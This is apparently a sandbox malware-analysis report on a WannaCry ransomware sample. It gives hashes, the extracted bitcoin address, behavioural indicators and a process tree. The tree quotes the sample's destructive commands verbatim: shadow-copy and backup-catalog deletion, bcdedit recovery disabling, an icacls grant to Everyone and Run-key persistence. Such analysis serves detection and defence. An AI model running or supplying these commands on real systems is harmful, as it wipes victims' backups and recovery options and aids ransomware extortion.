Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
26-07-2021 12:42
Static task
static1
Behavioral task
behavioral1
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe
Resource
win10v20210408
General
-
Target
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe
-
Size
3.4MB
-
MD5
84c82835a5d21bbcf75a61706d8ab549
-
SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
-
SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
-
SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\@[email protected]
wannacry
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 16 IoCs
pid Process 1788 taskdl.exe 1876 @[email protected] 1028 @[email protected] 336 taskhsvc.exe 1880 taskse.exe 1452 @[email protected] 968 taskdl.exe 1320 taskse.exe 1556 @[email protected] 1704 taskdl.exe 1116 taskse.exe 732 @[email protected] 1580 taskdl.exe 1184 taskse.exe 1208 @[email protected] 1872 taskdl.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\RenamePublish.png.WNCRYT => C:\Users\Admin\Pictures\RenamePublish.png.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File opened for modification C:\Users\Admin\Pictures\RenamePublish.png.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File opened for modification C:\Users\Admin\Pictures\RemoveResolve.tiff ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File opened for modification C:\Users\Admin\Pictures\RemoveResolve.tiff.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File renamed C:\Users\Admin\Pictures\BackupDisconnect.raw.WNCRYT => C:\Users\Admin\Pictures\BackupDisconnect.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File opened for modification C:\Users\Admin\Pictures\BackupDisconnect.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File created C:\Users\Admin\Pictures\RemoveResolve.tiff.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File renamed C:\Users\Admin\Pictures\RemoveResolve.tiff.WNCRYT => C:\Users\Admin\Pictures\RemoveResolve.tiff.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File created C:\Users\Admin\Pictures\RenamePublish.png.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe File created C:\Users\Admin\Pictures\BackupDisconnect.raw.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe -
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7984.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe -
Loads dropped DLL 39 IoCs
pid Process 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1340 cscript.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1828 cmd.exe 1828 cmd.exe 1876 @[email protected] 1876 @[email protected] 336 taskhsvc.exe 336 taskhsvc.exe 336 taskhsvc.exe 336 taskhsvc.exe 336 taskhsvc.exe 336 taskhsvc.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1176 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\avwggwjmhgtjt701 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1432 vssadmin.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 564 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 336 taskhsvc.exe 336 taskhsvc.exe 336 taskhsvc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1452 @[email protected] -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeBackupPrivilege 1428 vssvc.exe Token: SeRestorePrivilege 1428 vssvc.exe Token: SeAuditPrivilege 1428 vssvc.exe Token: SeIncreaseQuotaPrivilege 1528 WMIC.exe Token: SeSecurityPrivilege 1528 WMIC.exe Token: SeTakeOwnershipPrivilege 1528 WMIC.exe Token: SeLoadDriverPrivilege 1528 WMIC.exe Token: SeSystemProfilePrivilege 1528 WMIC.exe Token: SeSystemtimePrivilege 1528 WMIC.exe Token: SeProfSingleProcessPrivilege 1528 WMIC.exe Token: SeIncBasePriorityPrivilege 1528 WMIC.exe Token: SeCreatePagefilePrivilege 1528 WMIC.exe Token: SeBackupPrivilege 1528 WMIC.exe Token: SeRestorePrivilege 1528 WMIC.exe Token: SeShutdownPrivilege 1528 WMIC.exe Token: SeDebugPrivilege 1528 WMIC.exe Token: SeSystemEnvironmentPrivilege 1528 WMIC.exe Token: SeRemoteShutdownPrivilege 1528 WMIC.exe Token: SeUndockPrivilege 1528 WMIC.exe Token: SeManageVolumePrivilege 1528 WMIC.exe Token: 33 1528 WMIC.exe Token: 34 1528 WMIC.exe Token: 35 1528 WMIC.exe Token: SeIncreaseQuotaPrivilege 1528 WMIC.exe Token: SeSecurityPrivilege 1528 WMIC.exe Token: SeTakeOwnershipPrivilege 1528 WMIC.exe Token: SeLoadDriverPrivilege 1528 WMIC.exe Token: SeSystemProfilePrivilege 1528 WMIC.exe Token: SeSystemtimePrivilege 1528 WMIC.exe Token: SeProfSingleProcessPrivilege 1528 WMIC.exe Token: SeIncBasePriorityPrivilege 1528 WMIC.exe Token: SeCreatePagefilePrivilege 1528 WMIC.exe Token: SeBackupPrivilege 1528 WMIC.exe Token: SeRestorePrivilege 1528 WMIC.exe Token: SeShutdownPrivilege 1528 WMIC.exe Token: SeDebugPrivilege 1528 WMIC.exe Token: SeSystemEnvironmentPrivilege 1528 WMIC.exe Token: SeRemoteShutdownPrivilege 1528 WMIC.exe Token: SeUndockPrivilege 1528 WMIC.exe Token: SeManageVolumePrivilege 1528 WMIC.exe Token: 33 1528 WMIC.exe Token: 34 1528 WMIC.exe Token: 35 1528 WMIC.exe Token: SeTcbPrivilege 1880 taskse.exe Token: SeTcbPrivilege 1880 taskse.exe Token: SeTcbPrivilege 1320 taskse.exe Token: SeTcbPrivilege 1320 taskse.exe Token: SeTcbPrivilege 1116 taskse.exe Token: SeTcbPrivilege 1116 taskse.exe Token: SeTcbPrivilege 1184 taskse.exe Token: SeTcbPrivilege 1184 taskse.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 1028 @[email protected] 1876 @[email protected] 1028 @[email protected] 1876 @[email protected] 1452 @[email protected] 1452 @[email protected] 1556 @[email protected] 732 @[email protected] 1208 @[email protected] -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2024 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 26 PID 1628 wrote to memory of 2024 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 26 PID 1628 wrote to memory of 2024 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 26 PID 1628 wrote to memory of 2024 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 26 PID 1628 wrote to memory of 1176 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 28 PID 1628 wrote to memory of 1176 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 28 PID 1628 wrote to memory of 1176 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 28 PID 1628 wrote to memory of 1176 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 28 PID 1628 wrote to memory of 1788 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 32 PID 1628 wrote to memory of 1788 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 32 PID 1628 wrote to memory of 1788 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 32 PID 1628 wrote to memory of 1788 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 32 PID 1628 wrote to memory of 820 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 34 PID 1628 wrote to memory of 820 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 34 PID 1628 wrote to memory of 820 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 34 PID 1628 wrote to memory of 820 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 34 PID 820 wrote to memory of 1340 820 cmd.exe 36 PID 820 wrote to memory of 1340 820 cmd.exe 36 PID 820 wrote to memory of 1340 820 cmd.exe 36 PID 820 wrote to memory of 1340 820 cmd.exe 36 PID 1628 wrote to memory of 1876 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 38 PID 1628 wrote to memory of 1876 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 38 PID 1628 wrote to memory of 1876 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 38 PID 1628 wrote to memory of 1876 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 38 PID 1628 wrote to memory of 1828 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 39 PID 1628 wrote to memory of 1828 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 39 PID 1628 wrote to memory of 1828 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 39 PID 1628 wrote to memory of 1828 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 39 PID 1828 wrote to memory of 1028 1828 cmd.exe 41 PID 1828 wrote to memory of 1028 1828 cmd.exe 41 PID 1828 wrote to memory of 1028 1828 cmd.exe 41 PID 1828 wrote to memory of 1028 1828 cmd.exe 41 PID 1876 wrote to memory of 336 1876 @[email protected] 43 PID 1876 wrote to memory of 336 1876 @[email protected] 43 PID 1876 wrote to memory of 336 1876 @[email protected] 43 PID 1876 wrote to memory of 336 1876 @[email protected] 43 PID 1028 wrote to memory of 1588 1028 @[email protected] 45 PID 1028 wrote to memory of 1588 1028 @[email protected] 45 PID 1028 wrote to memory of 1588 1028 @[email protected] 45 PID 1028 wrote to memory of 1588 1028 @[email protected] 45 PID 1588 wrote to memory of 1432 1588 cmd.exe 47 PID 1588 wrote to memory of 1432 1588 cmd.exe 47 PID 1588 wrote to memory of 1432 1588 cmd.exe 47 PID 1588 wrote to memory of 1432 1588 cmd.exe 47 PID 1588 wrote to memory of 1528 1588 cmd.exe 49 PID 1588 wrote to memory of 1528 1588 cmd.exe 49 PID 1588 wrote to memory of 1528 1588 cmd.exe 49 PID 1588 wrote to memory of 1528 1588 cmd.exe 49 PID 1628 wrote to memory of 1880 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 51 PID 1628 wrote to memory of 1880 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 51 PID 1628 wrote to memory of 1880 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 51 PID 1628 wrote to memory of 1880 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 51 PID 1628 wrote to memory of 1452 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 52 PID 1628 wrote to memory of 1452 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 52 PID 1628 wrote to memory of 1452 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 52 PID 1628 wrote to memory of 1452 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 52 PID 1628 wrote to memory of 904 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 53 PID 1628 wrote to memory of 904 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 53 PID 1628 wrote to memory of 904 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 53 PID 1628 wrote to memory of 904 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 53 PID 1628 wrote to memory of 968 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 55 PID 1628 wrote to memory of 968 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 55 PID 1628 wrote to memory of 968 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 55 PID 1628 wrote to memory of 968 1628 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe 55 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2024 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Loads dropped DLL
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:2024
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1176
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1788
-
-
C:\Windows\SysWOW64\cmd.execmd /c 12831627312236.bat2⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵
- Loads dropped DLL
PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:336
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:1432
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1452
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "avwggwjmhgtjt701" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f2⤵PID:904
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "avwggwjmhgtjt701" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:968
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1704
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:732
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1872
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1428